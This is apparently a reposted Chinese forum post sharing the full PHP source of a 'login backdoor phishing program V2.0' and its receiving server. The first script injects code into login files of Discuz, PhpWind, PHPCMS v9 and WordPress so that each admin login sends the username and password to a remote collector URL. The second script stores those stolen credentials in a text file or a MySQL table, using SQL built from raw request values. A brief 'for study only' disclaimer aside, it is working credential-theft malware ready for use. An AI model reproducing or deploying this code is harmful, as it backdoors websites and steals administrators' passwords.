【转】登录后门钓鱼程序 V2.0

此版本中相对1.0版本加入了接收端mysql存储支持。
自动插入后门端加入dz和wordpress的支持
代码:
<?php /** +----------------------------------------------------------------- * 登录后门钓鱼程序 V2.0 +----------------------------------------------------------------- * 功能介绍: * 本程序会根据所选cms和BBS系统自动插入钓鱼后门 * 后续将完善支持PHP的主流的cms和bbs系统 * 本程序仅供学习参考,请勿非法用途 ,请保留版权信息 +----------------------------------------------------------------- * 作者: Return Blogs: www.creturn.com email:master@creturn.com +----------------------------------------------------------------- **/ error_reporting(0); $rHost = 'http://192.168.1.199/MyProject/server/sever.php'; //定义接收地址 $pUname = 'uname'; //远程端接收用户名参数 $pPwd = 'pwd'; //定义远程接收密码参数 $error = ''; /** * 插入代码 */ function inSertPwdDoor($cmsCode,$relPath){ global $rHost,$pUname,$pPwd; //读取用户名密码特制 if($cmsCode['mothed'] == 'post'){ $rHostPath = $rHost.'?'.$pUname.'=$_POST['.$cmsCode['uname'].']&'.$pPwd.'=$_POST['.$cmsCode['pwd'].']'; }else{ $rHostPath = $rHost.'?'.$pUname.'=$_GET['.$cmsCode['uname'].']&'.$pPwd.'=$_GET['.$cmsCode['pwd'].']'; } //获取插入代码 $keyword = $cmsCode['keyword']; $replace = 'file_get_contents("'.$rHostPath.'");'.$cmsCode['bedeck'].$keyword; $loginPageContent = file_get_contents($relPath); $loginPageContent = str_replace($keyword, $replace, $loginPageContent); if(file_put_contents($relPath, $loginPageContent)){ tipAmessage('成功插入!'); }else{ tipAmessage('插入失败!'); } } function tipAmessage($msg){ global $error; $error = $msg; } /** * 各类cms登录标识码和文件路径 * * $code说明: * $code['keyword'] 关键字,就是要插入代码的特征码 * $code['bedeck'] 修饰符用来修正代码的外观 * $code['uname'] 用户名变量名 * $code['pwd'] 密码变量名 * $code['mothed'] 密码提交方式:POST 或者 GET * $code['path'] 登录文件路径 * 注意事项: * 由于登录口不同程序可能有多个登录方法,正常登录 * 或者ajax或者第三方登录,所以登录点的关键词必须找准 */ function switchCms($cmsName){ $code = array(); switch ($cmsName) { case 'phpcmsV9': $code['path'] = 'phpcms/modules/admin/index.php'; $code['keyword'] = "showmessage(L('login_success'),'?m=admin&c=index');"; $code['bedeck'] = "nttt"; $code['uname'] = 'username'; $code['pwd'] = 'password'; $code['mothed'] = 'post'; break; case 'dedecms': break; case 'dz': $code['path'] = 'source/class/class_admincp.php'; $code['keyword'] = "$cpgroupid = DB::result_first"; $code['bedeck'] = "nttttt"; $code['uname'] = 'admin_username'; $code['pwd'] = 'admin_password'; $code['mothed'] = 'post'; break; case 'phpwind': $code['path'] = 'admin/admincp.php'; $code['keyword'] = "$REQUEST_URI = trim($REQUEST_URI,'?#');"; $code['bedeck'] = "nt"; $code['uname'] = 'admin_name'; $code['pwd'] = 'admin_pwd'; $code['mothed'] = 'post'; break; case 'wordpress': $code['path'] = 'wp-includes/user.php'; $code['keyword'] = "$user = new WP_User($userdata->ID);"; $code['bedeck'] = "nt"; $code['uname'] = 'log'; $code['pwd'] = 'pwd'; $code['mothed'] = 'post'; break; default: ; break; } return $code; } if(isset($_POST['creack']) && $_POST['creack'] != ''){ $webRoot = $_SERVER['DOCUMENT_ROOT']; //当前目录 $dir = isset($_POST['dir']) && !empty($_POST['dir']) ? trim($_POST['dir']) : ''; $cms = isset($_POST['cms']) && !empty($_POST['cms']) ? trim($_POST['cms']) : ''; $cmsCode = switchCms($_POST['cms']); if(empty($cmsCode)){ $error = '没找到可用CMS或者BBS'; }else{ $relPath = $webRoot.$dir.$cmsCode['path']; if(file_exists($relPath)){ inSertPwdDoor($cmsCode,$relPath); }else{ tipAmessage('没有找到该文件路径:'.$relPath); } } } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>自动插入语句</title> <style type="text/css"> *{ font-size:14px; line-height:20px; } div{ width:450px; margin: 0px auto; } </style> </head> <body> <div style="width:600px;margin: 0px auto;padding-top: 50px;padding-bottom: 50px; border: 1px #fff012 solid;"> <form action="" method="post"> <div> <h2 style="text-align: center;">登录后门钓鱼程序 V2.0 </h2> </div> <div> <h4 style="color: red">注意:Path参数,默认根目录不用填写,如果目标程序在子目录中请填入路径</h4> </div> <div> 当前文件路径:<?php echo __FILE__?><br/> </div> <div> <input type="radio" value="dz" name="cms" id="dzcms" /><label for="dzcms">Discuz</label> <input type="radio" value="phpwind" name="cms" id="phpwind" /><label for="phpwind">PhpWind</label> <input type="radio" value="phpcmsV9" name="cms" id="v9cms" /><label for="v9cms">PHPCMSv9</label> <input type="radio" value="dedecms" name="cms" id="dedecms" /><label for="dedecms">DedeCms</label> <input type="radio" value="wordpress" name="cms" id="wrodpress" /><label for="wrodpress">WordPress</label> </div> <div> <span>Path:</span></span><input type="text" name="dir" /> <input type="submit" name="creack" value="插入后门" /> </div> <div style="text-align: left; color: red; margin-top:20px;">消息:<?php echo $error;?></div> </form> </div> </body> </html>
接收端:
<?php /* * 用来接收钓鱼程序提交过来的密码, * 本程序目前支持存储文件和数据库两种方式 * 后续开发中将支持mail提醒,和第三方接口 * QQ消息,其实自己很久没研究了,不知道现在 * 的接口还能用不。可以到时候集成进来 * 本服务端可独立使用,提交方式 * http://localhost/sever.php?uname=用户名&pwd=密码&rsite=站点名字 * Author:Return Blogs: www.creturn.com Email: master@creturn.com * 版本:V 2.0 * */ $saveWay = 'mysql'; //存储方式,mysql:存储数据库中,file:存储文件中,mail,通过邮件发送,qq:通过webQQ协议实现QQ发送消息 /** * 安全过滤 * 根据你自己的需求自行添加 * 建议添加上去,防止被注入 */ function filterSecInfo(){ } /** * 保存为文本形式 */ function saveToText(){ $pwd = 'pwd.txt'; $content = @file_get_contents($pwd)."n Uname:".$_GET['uname'].'#Pwd:'.$_GET['pwd'].'#site:'.$_GET['rsite']; file_put_contents($pwd, $content); } /** * 保存到数据库 */ function saveToDBserver(){ filterSecInfo(); //过滤安全隐患 //插入数据库中的值 $name = @$_GET['uname']; $pword = @$_GET['pwd']; $site = @$_GET['rsite']; empty($name) || empty($pword) ? exit('Not Insert') : ''; //如果密码或者用户名为空就不用存储了 $site = empty($site) ? 'No site info' : $site; //数据库配置 $dbHost = 'localhost'; //数据库主机地址,默认本地数据库localhost $dbName = 'pwd'; //数据库名 $uname = 'root'; //数据库用户名 $pwd = ''; //数据库密码 $con = @mysql_connect($dbHost,$uname,$pwd) or die('无法连接数据库,请确认数据库信息可用!'); mysql_select_db($dbName) or die('没找到此数据库,请创建!'); $sql = "SELECT * FROM `adminlist` WHERE `name` = '$name' AND `password` = '$pword' AND site = '$site'"; $result = @mysql_query($sql,$con); $num_rows = @mysql_num_rows($result); if(empty($num_rows)){ //过滤重复数据,插入库中没有的数据 $sql = "INSERT INTO adminlist(adminlist.`name`,adminlist.`password`,adminlist.`site`) VALUES ('$name','$pword','$site')"; $result = @mysql_query($sql,$con); $num_rows = @mysql_num_rows($result); echo $num_rows; }else{ echo '库中已有!'; } @mysql_free_result($result); } /** * 保存到邮箱中,也就是发送数据到指定邮箱 */ function saveToEmail(){ } /** * 邮件通知 */ function mailTipMessage(){ } /** * QQ消息提醒 * 通过wap协议QQ发送消息 */ function qqTipMessage(){ } /** * 第三方存储接口 */ function otherApi(){ } /** * 存储数据 */ function saveData(){ global $saveWay; switch ($saveWay) { case 'file': saveToText(); //保存到文件中 break; case 'mysql': saveToDBserver(); break; } } saveData();